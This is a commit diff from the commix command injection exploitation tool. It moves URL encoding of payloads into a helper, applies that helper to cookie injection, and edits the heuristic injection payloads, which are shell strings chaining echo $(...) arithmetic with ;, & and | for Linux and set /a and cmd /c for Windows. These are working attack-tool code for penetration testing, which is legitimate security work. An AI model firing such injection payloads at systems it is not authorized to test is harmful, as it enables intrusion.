Minor update

commixproject · Jun 21, 2024 · 0e0f470 · 0e0f470
1 parent d549ffd
commit 0e0f470
Show file tree

Hide file tree

Showing 4 changed files with 16 additions and 9 deletions.
diff --git a/src/core/injections/controller/checks.py b/src/core/injections/controller/checks.py
@@ -100,6 +100,15 @@ def injection_techniques_status():
 def quoted_value(value):
   return '"{}"'.format(value)
 
+"""
+Payload fixation
+"""
+def payload_fixation(payload):
+
+  payload = _urllib.parse.unquote(payload)
+  payload = _urllib.parse.quote(payload)
+  return payload
+
 """
 Check for non custom parameters.
 """

diff --git a/src/core/injections/controller/controller.py b/src/core/injections/controller/controller.py
@@ -84,9 +84,8 @@ def heuristic_request(url, http_request_method, check_parameter, payload, whites
   payload = checks.perform_payload_modification(payload)
   if settings.VERBOSITY_LEVEL >= 1:
     print(settings.print_payload(payload))
-  payload = _urllib.parse.unquote(payload)
-  payload = _urllib.parse.quote(payload)
   if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
+    payload = checks.payload_fixation(payload)
     cookie = menu.options.cookie.replace(settings.TESTABLE_VALUE + settings.INJECT_TAG, settings.INJECT_TAG).replace(settings.INJECT_TAG, payload).encode(settings.DEFAULT_CODEC)
   elif not settings.IGNORE_USER_DEFINED_POST_DATA and menu.options.data and settings.INJECT_TAG in menu.options.data:
     data = menu.options.data.replace(settings.TESTABLE_VALUE + settings.INJECT_TAG, settings.INJECT_TAG).replace(settings.INJECT_TAG, payload).encode(settings.DEFAULT_CODEC)

diff --git a/src/core/requests/requests.py b/src/core/requests/requests.py
@@ -430,8 +430,6 @@ def get_request_response(request):
 def cookie_injection(url, vuln_parameter, payload, http_request_method):
 
   def inject_cookie(url, vuln_parameter, payload, http_request_method):
-    if settings.TIME_RELATIVE_ATTACK :
-      payload = _urllib.parse.quote(payload)
 
     # Check if defined POST data
     if settings.USER_DEFINED_POST_DATA:
@@ -442,7 +440,8 @@ def inject_cookie(url, vuln_parameter, payload, http_request_method):
     #Check if defined extra headers.
     headers.do_check(request)
     payload = checks.newline_fixation(payload)
-    payload = payload.replace("+", "%2B")
+    payload = checks.payload_fixation(payload)
+    # payload = payload.replace("+", "%2B")
     if settings.INJECT_TAG in menu.options.cookie:
       request.add_header(settings.COOKIE, menu.options.cookie.replace(settings.TESTABLE_VALUE + settings.INJECT_TAG, settings.INJECT_TAG).replace(settings.INJECT_TAG, payload))
     else:

diff --git a/src/utils/settings.py b/src/utils/settings.py
@@ -247,7 +247,7 @@ def sys_argv_errors():
 DESCRIPTION = "The command injection exploiter"
 AUTHOR  = "Anastasios Stasinopoulos"
 VERSION_NUM = "4.0"
-REVISION = "73"
+REVISION = "74"
 STABLE_RELEASE = False
 VERSION = "v"
 if STABLE_RELEASE:
@@ -323,11 +323,11 @@ class HEURISTIC_TEST(object):
 RAND_B = random.randint(1,10000)
 CALC_STRING = str(RAND_A) + " %2B " + str(RAND_B)
 BASIC_STRING = "(" + CALC_STRING + ")"
-BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + BASIC_STRING + ")%26%26echo $(" + BASIC_STRING + ")||echo $(" + BASIC_STRING + ")",
-                                   "|set /a " + BASIC_STRING + "&set /a " + BASIC_STRING
+BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + BASIC_STRING + ")%26echo $(" + BASIC_STRING + ")|echo $(" + BASIC_STRING + ")" + RANDOM_STRING_GENERATOR ,
+                                   "|set /a " + BASIC_STRING + "%26set /a " + BASIC_STRING
                                    ]
 ALTER_SHELL_BASIC_STRING = " -c \"print(int(" + CALC_STRING + "))\""
-ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")%26%26echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")||echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")",
+ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")%26echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")|echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")",
                                    "|for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL + " &for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL
                                    ]
 BASIC_COMMAND_INJECTION_RESULT = str(RAND_A + RAND_B)